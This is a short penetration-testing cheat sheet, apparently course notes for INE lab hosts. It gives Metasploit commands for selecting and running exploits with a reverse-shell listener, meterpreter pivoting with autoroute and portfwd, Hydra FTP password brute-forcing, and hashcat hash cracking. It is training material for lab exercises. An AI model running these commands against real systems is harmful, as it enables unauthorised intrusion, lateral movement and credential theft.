Most used tools

Identify and modify exploits

Tools: msfconsole, searchsploit

Usage:

  1. Search an exploit

msfconsole -q
search proftpd

  1. Select an exploit:

use exploit/...

  1. Modify the exploit:

show options
set RHOSTS demo.ine.local
set LHOST 192.0.0.1
set LPORT 6789

  1. Run the exploit:

run

Demonstrate pivoting by adding a route and port forwarding

Tools: autoroute, portfwd

Context: To execute it, first we must have a meterpreter shell

Usage:

  1. Identify our IP in the subnet

ipconfig

  1. Run autoroute. If our IP is 10.0.19.197...

run autoroute -s 10.0.19.0/20

  1. Scan for new hosts

background
use auxiliary/scanner/portscan/tcp
set RHOSTS demo2.ine.local
set PORTS 1-100
exploit

  1. Pivot by port forwarding

sessions -i
portfwd add -l 1234 -p 80 -r <demo2.ine.local IP>
portfwd list

  1. In our local execute:

nmap -sCV -sS -p 1234 localhost

Conduct brute-force password attacks

Tools: Hydra, msfconsole

Usage:

hydra -L /usr/share/metasploit-framework/data/wordlists/unix_users.txt -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt demo.ine.local ftp

Conduct hash cracking

Tools: hashcat, john

Usage:

hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt
PreviousHost & Network PentestingNextWeb Application Pentesting

Last updated